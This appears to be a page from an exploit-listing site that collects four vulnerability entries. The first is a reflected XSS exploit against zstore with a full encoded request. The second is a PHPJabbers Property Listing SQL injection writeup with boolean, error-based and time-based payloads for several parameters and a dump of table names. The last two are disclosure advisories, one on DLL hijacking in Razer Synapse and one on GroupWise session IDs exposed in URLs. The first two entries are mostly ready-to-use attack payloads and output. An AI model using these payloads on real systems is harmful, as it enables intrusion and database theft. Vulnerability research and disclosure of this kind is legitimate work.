Latest exploits :: CodePwn

<pre><code>## Title: zstore-6.6.0 - XSS-Reflected ## Development: nu11secur1ty ## Date: 01.29.2023 ## Vendor: https://zippy.com.ua/ ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 ## Description: The value of manual insertion `point 1` is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2 Host: store.zippy.com.ua Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` [+] Response: ``` HTTP/2 200 OK Server: nginx Date: Sun, 29 Jan 2023 07:27:55 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546 Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist 82 /home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php ``` ## Proof and Exploit: [href](https://streamable.com/aadj5c) ## Reference: [href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected) </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : PHPJabbers.com │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Property Listing Script 3.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: preview.php /preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33 GET parameter 'feature_id' is vulnerable to SQLI --- Parameter: feature_id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'min_bedrooms' is vulnerable to SQLI --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'max_bedrooms' is vulnerable to SQLI --- Parameter: max_bedrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'min_bathrooms' is vulnerable to SQLI --- Parameter: min_bathrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'max_bathrooms' is vulnerable to SQLI --- Parameter: max_bathrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33 --- [+] Starting the Attack fetching tables for database: '********_****_***' Database: ********_****_*** [66 tables] +------------------------------------------+ | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale_languages | | property_listing_plugin_locale | | property_listing_plugin_log_config | | property_listing_plugin_log | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties_features | | property_listing_properties | | property_listing_roles | | property_listing_types | | property_listing_users | | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale_languages | | property_listing_plugin_locale | | property_listing_plugin_log_config | | property_listing_plugin_log | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties_features | | property_listing_properties | | property_listing_roles | | property_listing_types | | property_listing_users | | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale | | property_listing_plugin_locale_languages | | property_listing_plugin_log | | property_listing_plugin_log_config | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties | | property_listing_properties_features | | property_listing_roles | | property_listing_types | | property_listing_users | +------------------------------------------+ [-] Done </code></pre>

<pre><code> Advisory ID: SYSS-2022-047 Product: Razer Synapse Manufacturer: Razer Inc. Affected Version(s): Versions before 3.7.0830.081906 Tested Version(s): 3.7.0731.072516 Vulnerability Type: Improper Certificate Validation (CWE-295) Risk Level: High Solution Status: Open Manufacturer Notification: 2022-08-02 Solution Date: 2022-09-06 Public Disclosure: 2022-12-21 CVE Reference: CVE-2022-47632 Author of Advisory: Dr. Oliver Schwarz, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Razer Synapse is an additional driver software for Razer gaming devices. The manufacturer describes the product as a "unified cloud-based hardware configuration tool" (see [1]). Due to an unsafe installation path, improper privilege management, and improper certificate validation, the associated system service "Razer Synapse Service" is vulnerable to DLL hijacking. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows. In order to exploit the vulnerability, the attacker needs physical access to the machine and needs to prepare the attack before Razer Synapse is installed along with a Razer driver. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The attack scenario considers a Windows machine without any previous installation of any Razer device or software. The attacker has a local unprivileged Windows account, physical access to the machine, and a device which is either a Razer peripheral or able to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero). The attacker aims at executing code with full system privileges. The attack exploits the Razer Synapse Service which runs with elevated privileges. While the main binary of the service is stored in the protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it dynamically loads libraries from "C:\ProgramData\Razer\Synapse3\Service\bin". Before the installation, standard users can write to this path, since "C:\ProgramData" is world-writable on a standard installation of Windows. The Synapse installation procedure changes access privileges, so that standard users cannot write to the path any longer. However, if the path is created before the driver installation, the creator can set own files to be read-only and deny write access for the SYSTEM user. Upon start, the Synapse service checks the location for foreign DLLs, removes them and aborts upon failure to delete them. Nevertheless, the DLL check is simply based on verifying if the DLL is associated with ANY certificate information. The service does not verify if the certificate is actually valid or belongs to Razer. Note that the described vulnerability is similar to CVE-2021-44226, which has been fixed in Synapse version 3.7.0228.022817. The new attack differs from the original one in that the attacker now has to employ self-signed DLLs instead of non-signed ones. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The attack consists of the following steps: 1. Before the installation of the driver/Synapse, the attacker creates "C:\ProgramData\Razer\Synapse3\Service", copies a custom/malicious and self-signed version of userenv.dll into the directory, sets the DLL to read-only, and denies write access for SYSTEM. 2. Afterwards, the attacker triggers the installation of Synapse. This can be done without any elevated privileges by plugging in a Razer device and following the installation procedure for Synapse if device-specific co-installers are not disabled. Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero can be used and pretend to be a Razer device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Razer has published a patched version that will be deployed automatically upon driver installation on current Windows builds. To prevent similar attacks through other co-installers, system administrators can disable them by setting the following key in the Windows registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers = 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-02: Vulnerability discovered 2022-08-02: Vulnerability reported to manufacturer 2022-09-06: Patch released by manufacturer 2022-12-21: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Razer Synapse 3 https://www2.razer.com/eu-en/synapse-3 [2] SySS Security Advisory SYSS-2022-047 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-047.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH. E-Mail: oliver.schwarz@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc Key ID: 0x9716294F1294280D Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code># Trovent Security Advisory 2203-01 # ##################################### Micro Focus GroupWise transmits session ID in URL ################################################# Overview ######## Advisory ID: TRSA-2203-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2203-01 Affected product: Micro Focus GroupWise Affected version: prior to 18.4.2 Vendor: Micro Focus, https://www.microfocus.com Credits: Trovent Security GmbH, Stefan Pietsch Detailed description #################### Micro Focus GroupWise is a messaging software for email and personal information management. Trovent Security GmbH discovered that the GroupWise web application transmits the session ID in HTTP GET requests in the URL when email content is accessed. The exposed session ID can be recorded in the browser history of the client and in log files of the web server or reverse proxy server. A possible attacker with access to the browser history or the server log files is able to take control of the user session with the help of the session ID. Severity: Medium CVSS Score: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) CVE ID: CVE-2022-38756 CWE ID: CWE-598 Proof of concept ################ Simplified HTTP request: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GET /attachment?session=<SESSIONID>&id=... HTTP/1.1 Host: <HOSTNAME> ... X-User-Agent: GroupWise Web (18.4.0-139604) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### The vendor released a fixed version of GroupWise. Fixed in version 18.4.2. History ####### 2022-03-30: Vulnerability found 2022-08-05: Vendor contacted 2022-10-31: Contacted vendor again 2022-11-01: Vendor replied that the vulnerability will be investigated 2022-11-14: Vendor contacted, asking for status 2022-11-16: Vendor replied that a security bulletin is being prepared 2022-12-06: Vendor published security bulletin 2023-01-27: Advisory published </code></pre>